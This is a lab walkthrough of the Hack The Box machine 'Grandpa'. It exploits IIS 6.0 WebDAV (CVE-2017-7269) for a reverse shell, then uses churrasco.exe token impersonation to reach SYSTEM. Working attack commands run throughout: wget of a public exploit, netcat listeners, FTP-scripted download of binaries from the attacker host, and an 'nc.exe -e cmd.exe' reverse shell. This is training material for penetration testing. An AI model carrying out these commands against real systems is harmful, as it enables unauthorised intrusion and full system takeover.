HTB: Walkthrough without Metasploit. ~[GRANDPA]
IIS 6.0 privilege escalation using impersonation
machine IP: 10.10.10.14
1. Scanning and Enumeration-
doing a basic scan with Nmap will give below results
we can see many HTTP methods that are open one of which is PUT which can allow us to upload a shell.
visiting the IP we can see there is a default page.
check for PUT upload vulnerabilities, we will be using a tool DAVTEST which is there in Kali Linuxdavtest -url http://10.10.10.14
we failed to do, the PUT method is getting failed to upload the shell.
use searchsploit and find any exploit for the IISroot@kali:~# searchsploit IIS 6.0
using Microsoft IIS 6.0 — WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow exploit (https://exploit-db.com/exploits/41738 )
root@kali:~# searchsploit -m 41738
//the -m allows copying exploit in the current directory, checking CVE for this exploit we will look on google for CVE-2017–7269 and now looking and google for exploit “CVE-2017–7269 exploit Github” and download below exploit.
root@kali:~# wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell
rename the exploitroot@kali:~# mv iis6\ reverse\ shell exploit.py
2. Gaining Initial Access-
using Netcat to create a listener at 1234 root@kali:~# nc -nlvp 1234
Now run the exploit using python root@kali:~/hackthebox/07-Grandpa# python exploit.py 10.10.10.14 80 10.10.14.7 1234
NOTE — (we got the shell, if the exploit is not working simply try to rest machine and try again…) — in my case resetting the machine helped
here we got the shell but we don’t have privileges to access any of user, because we don’t have privileges
3. Privileges escalation-
Mostly we use for windows i.e Windows-Exploit-Suggester
root@kali:~# python windows-exploit-suggester.py --database 2020-04-04-mssb.xls --systeminfo ~/hackthebox/07-Grandpa/systeminfo.txt
we have got many exploits, I have tried all of them and failed but as I already said I want to solve without Metasploit, so if you want to try you can download compiled binaries of all exploits from here and give it a try.https://github.com/SecWiki/windows-kernel-exploits/
Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:
for more detail, you can check this blog- Link
Let’s download the exploit binary and copy nc.exe both on the same location
root@kali:~/hackthebox/07-Grandpa# wget https://github.com/Re4son/Churrasco/blob/master/churrasco.exe?raw=true
rename the binary mv churrasco.exe\?raw\=true churrasco.exe
root@kali:~/hackthebox/07-Grandpa# cp /usr/share/windows-resources/binaries/nc.exe .
Now on the Box, we need to upload our binary, I tried with PowerShell, but it’s not available there so we will use FTP to download, before start the FTP server using python on kali, see now we have to do file transfer so we are going to use FTP so let’s start FTP server -.
root@kali:~/hackthebox/07-Grandpa# python -m pyftpdlib -p 21
On Box, we need a directory so that we can write some files there go to
C:\>cd wmpub
C:\wmpub>echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET churrasco.exe >> ftp.txt&echo bye>> ftp.txt
creating a file ftp.txt which will have commands to download churrasco.exe
C:\wmpub>ftp -v -n -s:ftp.txt
C:\wmpub>echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET nc.exe >> ftp.txt&echo bye>> ftp.txt
creating a file ftp.txt which will have commands to download nc.exe
C:\wmpub>ftp -v -n -s:ftp.txt
checking the FTP server
and on the shell, we can see got both the binaries
create a Listener on port 7777 for churrasco.exe
to create a reverse connection with our host nc -nlvp 7777
and now execute the binary
churrasco.exe -d "C:\wmpub\nc.exe 10.10.14.7 7777 -e cmd.exe"
now check the listener and here you got the system access
Thanks to Rana Khalil — Inspired by her Journey!
Thanks to MrNmap — for the blog of Windows Privilege Escalation via Token Kidnapping